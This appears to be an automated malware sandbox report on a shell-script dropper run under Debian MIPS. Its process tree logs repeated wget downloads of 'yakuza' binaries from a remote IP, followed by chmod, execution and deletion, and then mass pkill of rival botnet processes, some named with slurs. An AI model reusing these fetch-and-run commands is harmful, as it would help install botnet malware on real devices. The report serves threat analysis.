Analysis
-
max time kernel
123s
-
max time network
151s
-
platform
debian-9_mips
-
resource
debian9-mipsbe-20240611-en
-
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
-
submitted
13-11-2024 02:19
Static task
static1
Behavioral task
behavioral1
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh
-
Size
1KB
-
MD5
06e945470e277d1953b8348f96d6bdab
-
SHA1
97c9f6a0ac42ab524a999911fb340a9201eb7f77
-
SHA256
41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1
-
SHA512
9296c41fdc556cee147ab81f052d487dcbe9f8ea8227896e3f389f14bebeeaf6b440fb677b3ea33c629430127b4eedf4776bb0576d14c758afd481ee007307ab
Malware Config
Signatures
-
Contacts a large (60292) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid Process
811 chmod
890 chmod
911 chmod
949 chmod
968 chmod
739 chmod
751 chmod
782 chmod
982 chmod
1002 chmod
724 chmod
859 chmod
876 chmod
-
Executes dropped EXE 1 IoCs
Processes:
ioc pid Process
/tmp/yakuza.mips 726 yakuza.mips
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
File opened for reading, by pkill:
/sys/devices/system/cpu/online
-
Processes:
pkill
-
System Network Configuration Discovery 1 TTPs 9 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid Process
726 yakuza.mips
732 wget
1099 sh
1101 busybox
706 wget
728 rm
741 yakuza.mipsel
745 rm
1100 pkill
-
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
File opened for modification, by wget:
/tmp/yakuza.mipsel
/tmp/yakuza.x86
/tmp/yakuza.arm6
/tmp/yakuza.ppc
/tmp/yakuza.m68k
/tmp/yakuza.arm5
/tmp/yakuza.arm7
/tmp/yakuza.sparc
/tmp/yakuza.mips
/tmp/yakuza.sh
/tmp/yakuza.i686
/tmp/yakuza.i586
/tmp/yakuza.arm4
Processes
-
- /tmp/41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh: /tmp/41fad988fd44fcd0e58f195773c40b5c8a45e15870a096746414922b05f653b1.sh (PID 702)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.mips (PID 706) [System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.mips (PID 724) [File and Directory Permissions Modification]
  - /tmp/yakuza.mips: ./yakuza.mips (PID 726) [Executes dropped EXE; System Network Configuration Discovery]
    - /bin/sh: sh -c "pkill -9 902i13 || busybox pkill -9 902i13" (PID 731)
      - /usr/bin/pkill: pkill -9 902i13 (PID 733) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 902i13 (PID 735)
    - /bin/sh: sh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY" (PID 744)
      - /usr/bin/pkill: pkill -9 BzSxLxBxeY (PID 746)
      - /bin/busybox: busybox pkill -9 BzSxLxBxeY (PID 748)
    - /bin/sh: sh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7" (PID 749)
      - /usr/bin/pkill: pkill -9 HOHO-LUGO7 (PID 750) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 HOHO-LUGO7 (PID 754)
    - /bin/sh: sh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL" (PID 757)
      - /usr/bin/pkill: pkill -9 HOHO-U79OL (PID 758) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 HOHO-U79OL (PID 759)
    - /bin/sh: sh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87" (PID 760)
      - /usr/bin/pkill: pkill -9 JuYfouyf87 (PID 761) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 JuYfouyf87 (PID 762)
    - /bin/sh: sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd" (PID 763)
      - /usr/bin/pkill: pkill -9 NiGGeR69xd (PID 764) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 NiGGeR69xd (PID 766)
    - /bin/sh: sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X" (PID 767)
      - /usr/bin/pkill: pkill -9 SO190Ij1X (PID 768) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 SO190Ij1X (PID 769)
    - /bin/sh: sh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE" (PID 770)
      - /usr/bin/pkill: pkill -9 LOLKIKEEEDDE (PID 771) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 LOLKIKEEEDDE (PID 772)
    - /bin/sh: sh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e" (PID 773)
      - /usr/bin/pkill: pkill -9 ekjheory98e (PID 774) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 ekjheory98e (PID 775)
    - /bin/sh: sh -c "pkill -9 scansh4 || busybox pkill -9 scansh4" (PID 776)
      - /usr/bin/pkill: pkill -9 scansh4 (PID 777) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 scansh4 (PID 778)
    - /bin/sh: sh -c "pkill -9 MDMA || busybox pkill -9 MDMA" (PID 779)
      - /usr/bin/pkill: pkill -9 MDMA (PID 780) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 MDMA (PID 781)
    - /bin/sh: sh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex" (PID 783)
      - /usr/bin/pkill: pkill -9 fdevalvex (PID 785) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 fdevalvex (PID 790)
    - /bin/sh: sh -c "pkill -9 scanspc || busybox pkill -9 scanspc" (PID 791)
      - /usr/bin/pkill: pkill -9 scanspc (PID 792) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 scanspc (PID 793)
    - /bin/sh: sh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ" (PID 798)
      - /usr/bin/pkill: pkill -9 MELTEDNINJAREALZ (PID 799) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 MELTEDNINJAREALZ (PID 802)
    - /bin/sh: sh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids" (PID 809)
      - /usr/bin/pkill: pkill -9 flexsonskids (PID 810) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 flexsonskids (PID 812)
    - /bin/sh: sh -c "pkill -9 scanx86 || busybox pkill -9 scanx86" (PID 822)
      - /usr/bin/pkill: pkill -9 scanx86 (PID 823) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 scanx86 (PID 828)
    - /bin/sh: sh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL" (PID 836)
      - /usr/bin/pkill: pkill -9 MISAKI-U79OL (PID 837) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 MISAKI-U79OL (PID 839)
    - /bin/sh: sh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe" (PID 850)
      - /usr/bin/pkill: pkill -9 foAxi102kxe (PID 852) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 foAxi102kxe (PID 854)
    - /bin/sh: sh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj" (PID 863)
      - /usr/bin/pkill: pkill -9 swodjwodjwoj (PID 865) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 swodjwodjwoj (PID 868)
    - /bin/sh: sh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l" (PID 870)
      - /usr/bin/pkill: pkill -9 MmKiy7f87l (PID 871) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 MmKiy7f87l (PID 872)
    - /bin/sh: sh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86" (PID 873)
      - /usr/bin/pkill: pkill -9 freecookiex86 (PID 874) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 freecookiex86 (PID 875)
    - /bin/sh: sh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu" (PID 881)
      - /usr/bin/pkill: pkill -9 sysgpu (PID 882) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 sysgpu (PID 883)
    - /bin/sh: sh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd" (PID 884)
      - /usr/bin/pkill: pkill -9 NiGGeR69xd (PID 885) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 NiGGeR69xd (PID 886)
    - /bin/sh: sh -c "pkill -9 frgege || busybox pkill -9 frgege" (PID 887)
      - /usr/bin/pkill: pkill -9 frgege (PID 888) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 frgege (PID 889)
    - /bin/sh: sh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater" (PID 894)
      - /usr/bin/pkill: pkill -9 sysupdater (PID 895) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 sysupdater (PID 897)
    - /bin/sh: sh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd" (PID 898)
      - /usr/bin/pkill: pkill -9 0DnAzepd (PID 899) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 0DnAzepd (PID 900)
    - /bin/sh: sh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69" (PID 901)
      - /usr/bin/pkill: pkill -9 NiGGeRD0nks69 (PID 902) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 NiGGeRD0nks69 (PID 903)
    - /bin/sh: sh -c "pkill -9 frgreu || busybox pkill -9 frgreu" (PID 906)
      - /usr/bin/pkill: pkill -9 frgreu (PID 907) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 frgreu (PID 909)
    - /bin/sh: sh -c "pkill -9 telnetd || busybox pkill -9 telnetd" (PID 918)
      - /usr/bin/pkill: pkill -9 telnetd (PID 920) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 telnetd (PID 922)
    - /bin/sh: sh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964" (PID 929)
      - /usr/bin/pkill: pkill -9 0x766f6964 (PID 930) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 0x766f6964 (PID 932)
    - /bin/sh: sh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337" (PID 939)
      - /usr/bin/pkill: pkill -9 NiGGeRd0nks1337 (PID 941) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 NiGGeRd0nks1337 (PID 942)
    - /bin/sh: sh -c "pkill -9 gaft || busybox pkill -9 gaft" (PID 950)
      - /usr/bin/pkill: pkill -9 gaft (PID 953) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 gaft (PID 957)
    - /bin/sh: sh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa" (PID 959)
      - /usr/bin/pkill: pkill -9 urasgbsigboa (PID 960) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 urasgbsigboa (PID 961)
    - /bin/sh: sh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49" (PID 962)
      - /usr/bin/pkill: pkill -9 120i3UI49 (PID 963) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 120i3UI49 (PID 964)
    - /bin/sh: sh -c "pkill -9 OaF3 || busybox pkill -9 OaF3" (PID 965)
      - /usr/bin/pkill: pkill -9 OaF3 (PID 966) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 OaF3 (PID 967)
    - /bin/sh: sh -c "pkill -9 geae || busybox pkill -9 geae" (PID 973)
      - /usr/bin/pkill: pkill -9 geae (PID 974) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 geae (PID 975)
    - /bin/sh: sh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao" (PID 976)
      - /usr/bin/pkill: pkill -9 vaiolmao (PID 977) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 vaiolmao (PID 978)
    - /bin/sh: sh -c "pkill -9 123123a || busybox pkill -9 123123a" (PID 979)
      - /usr/bin/pkill: pkill -9 123123a (PID 980) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 123123a (PID 981)
    - /bin/sh: sh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D" (PID 987)
      - /usr/bin/pkill: pkill -9 Ofurain0n4H34D (PID 988) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 Ofurain0n4H34D (PID 989)
    - /bin/sh: sh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex" (PID 990)
      - /usr/bin/pkill: pkill -9 ggTrex (PID 991) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 ggTrex (PID 992)
    - /bin/sh: sh -c "pkill -9 wasads || busybox pkill -9 wasads" (PID 993)
      - /usr/bin/pkill: pkill -9 wasads (PID 994) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 wasads (PID 995)
    - /bin/sh: sh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD" (PID 996)
      - /usr/bin/pkill: pkill -9 1293194hjXD (PID 997) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 1293194hjXD (PID 998)
    - /bin/sh: sh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn" (PID 999)
      - /usr/bin/pkill: pkill -9 OthLaLosn (PID 1000) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 OthLaLosn (PID 1001)
    - /bin/sh: sh -c "pkill -9 ggt || busybox pkill -9 ggt" (PID 1006)
      - /usr/bin/pkill: pkill -9 ggt (PID 1007)
      - /bin/busybox: busybox pkill -9 ggt (PID 1008)
    - /bin/sh: sh -c "pkill -9 wget-log || busybox pkill -9 wget-log" (PID 1009)
      - /usr/bin/pkill: pkill -9 wget-log (PID 1010) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 wget-log (PID 1011)
    - /bin/sh: sh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER" (PID 1012)
      - /usr/bin/pkill: pkill -9 1337SoraLOADER (PID 1013) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 1337SoraLOADER (PID 1014)
    - /bin/sh: sh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA" (PID 1015)
      - /usr/bin/pkill: pkill -9 SAIAKINA (PID 1016)
      - /bin/busybox: busybox pkill -9 SAIAKINA (PID 1017)
    - /bin/sh: sh -c "pkill -9 ggtq || busybox pkill -9 ggtq" (PID 1018)
      - /usr/bin/pkill: pkill -9 ggtq (PID 1019) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 ggtq (PID 1020)
    - /bin/sh: sh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2" (PID 1021)
      - /usr/bin/pkill: pkill -9 1378bfp919GRB1Q2 (PID 1022)
      - /bin/busybox: busybox pkill -9 1378bfp919GRB1Q2 (PID 1023)
    - /bin/sh: sh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO" (PID 1024)
      - /usr/bin/pkill: pkill -9 SAIAKUSO (PID 1025) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 SAIAKUSO (PID 1026)
    - /bin/sh: sh -c "pkill -9 ggtr || busybox pkill -9 ggtr" (PID 1027)
      - /usr/bin/pkill: pkill -9 ggtr (PID 1028) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 ggtr (PID 1029)
    - /bin/sh: sh -c "pkill -9 14Fa || busybox pkill -9 14Fa" (PID 1030)
      - /usr/bin/pkill: pkill -9 14Fa (PID 1031) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 14Fa (PID 1032)
    - /bin/sh: sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337" (PID 1033)
      - /usr/bin/pkill: pkill -9 SEXSLAVE1337 (PID 1034) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 SEXSLAVE1337 (PID 1035)
    - /bin/sh: sh -c "pkill -9 ggtt || busybox pkill -9 ggtt" (PID 1036)
      - /usr/bin/pkill: pkill -9 ggtt (PID 1037) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 ggtt (PID 1038)
    - /bin/sh: sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4" (PID 1039)
      - /usr/bin/pkill: pkill -9 1902a3u912u3u4 (PID 1040) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 1902a3u912u3u4 (PID 1041)
    - /bin/sh: sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X" (PID 1042)
      - /usr/bin/pkill: pkill -9 SO190Ij1X (PID 1043) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 SO190Ij1X (PID 1044)
    - /bin/sh: sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr" (PID 1045)
      - /usr/bin/pkill: pkill -9 haetrghbr (PID 1046) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 haetrghbr (PID 1047)
    - /bin/sh: sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d" (PID 1048)
      - /usr/bin/pkill: pkill -9 19ju3d (PID 1049)
      - /bin/busybox: busybox pkill -9 19ju3d (PID 1050)
    - /bin/sh: sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120" (PID 1051)
      - /usr/bin/pkill: pkill -9 SORAojkf120 (PID 1052) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 SORAojkf120 (PID 1053)
    - /bin/sh: sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92" (PID 1054)
      - /usr/bin/pkill: pkill -9 hehahejeje92 (PID 1055)
      - /bin/busybox: busybox pkill -9 hehahejeje92 (PID 1056)
    - /bin/sh: sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91" (PID 1057)
      - /usr/bin/pkill: pkill -9 2U2JDJA901F91 (PID 1058)
      - /bin/busybox: busybox pkill -9 2U2JDJA901F91 (PID 1059)
    - /bin/sh: sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12" (PID 1060)
      - /usr/bin/pkill: pkill -9 SlaVLav12 (PID 1061) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 SlaVLav12 (PID 1062)
    - /bin/sh: sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh" (PID 1063)
      - /usr/bin/pkill: pkill -9 helpmedaddthhhhh (PID 1064) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 helpmedaddthhhhh (PID 1065)
    - /bin/sh: sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq" (PID 1066)
      - /usr/bin/pkill: pkill -9 2wgg9qphbq (PID 1067) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 2wgg9qphbq (PID 1068)
    - /bin/sh: sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices" (PID 1069)
      - /usr/bin/pkill: pkill -9 Slav3Th3seD3vices (PID 1070) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 Slav3Th3seD3vices (PID 1071)
    - /bin/sh: sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ" (PID 1072)
      - /usr/bin/pkill: pkill -9 hzSmYZjYMQ (PID 1073) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 hzSmYZjYMQ (PID 1074)
    - /bin/sh: sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf" (PID 1075)
      - /usr/bin/pkill: pkill -9 5Gbf (PID 1076)
      - /bin/busybox: busybox pkill -9 5Gbf (PID 1077)
    - /bin/sh: sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL" (PID 1078)
      - /usr/bin/pkill: pkill -9 SoRAxD123LOL (PID 1079) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 SoRAxD123LOL (PID 1080)
    - /bin/sh: sh -c "pkill -9 iaGv || busybox pkill -9 iaGv" (PID 1081)
      - /usr/bin/pkill: pkill -9 iaGv (PID 1082) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 iaGv (PID 1083)
    - /bin/sh: sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3" (PID 1084)
      - /usr/bin/pkill: pkill -9 5aA3 (PID 1085) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 5aA3 (PID 1086)
    - /bin/sh: sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL" (PID 1087)
      - /usr/bin/pkill: pkill -9 SoRAxD420LOL (PID 1088) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 SoRAxD420LOL (PID 1089)
    - /bin/sh: sh -c "pkill -9 insomni || busybox pkill -9 insomni" (PID 1090)
      - /usr/bin/pkill: pkill -9 insomni (PID 1091) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 insomni (PID 1092)
    - /bin/sh: sh -c "pkill -9 640277 || busybox pkill -9 640277" (PID 1093)
      - /usr/bin/pkill: pkill -9 640277 (PID 1094) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 640277 (PID 1095)
    - /bin/sh: sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337" (PID 1096)
      - /usr/bin/pkill: pkill -9 SoraBeReppin1337 (PID 1097) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 SoraBeReppin1337 (PID 1098)
    - /bin/sh: sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache" (PID 1099) [System Network Configuration Discovery]
      - /usr/bin/pkill: pkill -9 ipcamCache (PID 1100) [Reads CPU attributes; Reads runtime system information; System Network Configuration Discovery]
      - /bin/busybox: busybox pkill -9 ipcamCache (PID 1101) [System Network Configuration Discovery]
    - /bin/sh: sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q" (PID 1102)
      - /usr/bin/pkill: pkill -9 66tlGg9Q (PID 1103) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 66tlGg9Q (PID 1104)
    - /bin/sh: sh -c "pkill -9 T || busybox pkill -9 T" (PID 1105)
      - /usr/bin/pkill: pkill -9 T (PID 1106) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 T (PID 1107)
    - /bin/sh: sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87" (PID 1108)
      - /usr/bin/pkill: pkill -9 jUYfouyf87 (PID 1109) [Reads CPU attributes; Reads runtime system information]
      - /bin/busybox: busybox pkill -9 jUYfouyf87 (PID 1110)
    - /bin/sh: sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3" (PID 1111)
      - /usr/bin/pkill: pkill -9 6ke3 (PID 1112) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 6ke3 (PID 1113)
    - /bin/sh: sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3" (PID 1114)
      - /usr/bin/pkill: pkill -9 TOKYO3 (PID 1115) [Reads CPU attributes]
      - /bin/busybox: busybox pkill -9 TOKYO3 (PID 1116)
    - /bin/sh: sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh" (PID 1117)
      - /usr/bin/pkill: pkill -9 lyEeaXul2dULCVxh (PID 1118) [Reads runtime system information]
      - /bin/busybox: busybox pkill -9 lyEeaXul2dULCVxh (PID 1119)
    - /bin/sh: sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z" (PID 1120)
      - /usr/bin/pkill: pkill -9 93OfjHZ2z (PID 1121) [Reads CPU attributes]
  - /bin/rm: rm -rf yakuza.mips (PID 728) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.mipsel (PID 732) [System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.mipsel (PID 739) [File and Directory Permissions Modification]
  - /tmp/yakuza.mipsel: ./yakuza.mipsel (PID 741) [System Network Configuration Discovery]
  - /bin/rm: rm -rf yakuza.mipsel (PID 745) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.sh (PID 747) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.sh (PID 751) [File and Directory Permissions Modification]
  - /tmp/yakuza.sh: ./yakuza.sh (PID 752)
  - /bin/rm: rm -rf yakuza.sh (PID 755)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.x86 (PID 756) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.x86 (PID 782) [File and Directory Permissions Modification]
  - /tmp/yakuza.x86: ./yakuza.x86 (PID 784)
  - /bin/rm: rm -rf yakuza.x86 (PID 788)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.arm6 (PID 789) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.arm6 (PID 811) [File and Directory Permissions Modification]
  - /tmp/yakuza.arm6: ./yakuza.arm6 (PID 813)
  - /bin/rm: rm -rf yakuza.arm6 (PID 816)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.i686 (PID 818) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.i686 (PID 859) [File and Directory Permissions Modification]
  - /tmp/yakuza.i686: ./yakuza.i686 (PID 861)
  - /bin/rm: rm -rf yakuza.i686 (PID 864)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.ppc (PID 866) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.ppc (PID 876) [File and Directory Permissions Modification]
  - /tmp/yakuza.ppc: ./yakuza.ppc (PID 877)
  - /bin/rm: rm -rf yakuza.ppc (PID 879)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.i586 (PID 880) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.i586 (PID 890) [File and Directory Permissions Modification]
  - /tmp/yakuza.i586: ./yakuza.i586 (PID 891)
  - /bin/rm: rm -rf yakuza.i586 (PID 893)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.m68k (PID 896) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.m68k (PID 911) [File and Directory Permissions Modification]
  - /tmp/yakuza.m68k: ./yakuza.m68k (PID 912)
  - /bin/rm: rm -rf yakuza.m68k (PID 915)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.arm4 (PID 917) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.arm4 (PID 949) [File and Directory Permissions Modification]
  - /tmp/yakuza.arm4: ./yakuza.arm4 (PID 951)
  - /bin/rm: rm -rf yakuza.arm4 (PID 954)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.arm5 (PID 956) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.arm5 (PID 968) [File and Directory Permissions Modification]
  - /tmp/yakuza.arm5: ./yakuza.arm5 (PID 969)
  - /bin/rm: rm -rf yakuza.arm5 (PID 971)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.arm7 (PID 972) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.arm7 (PID 982) [File and Directory Permissions Modification]
  - /tmp/yakuza.arm7: ./yakuza.arm7 (PID 983)
  - /bin/rm: rm -rf yakuza.arm7 (PID 985)
  - /usr/bin/wget: wget http://82.57.165.95/yakuza.sparc (PID 986) [Writes file to tmp directory]
  - /bin/chmod: chmod +x yakuza.sparc (PID 1002) [File and Directory Permissions Modification]
  - /tmp/yakuza.sparc: ./yakuza.sparc (PID 1003)
  - /bin/rm: rm -rf yakuza.sparc (PID 1005)
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
183KB
-
MD5
6b663dec7156331eee76ef1728d52b73
-
SHA1
50713911df22fd9f90a3175accf83f9ec7d5b486
-
SHA256
d8eeeeaf346781bc005b5bd15fc2fe90e183cbc57ebeef44d4c266b3b099b71d
-
SHA512
b647d10b39119dec04e757f8386f3cf808a0b6ffcb27b592145f328e213e270dd8977f323f267849a70f6be6a7bee51ec2e918ddfcf01fcaa0a1eb6596793013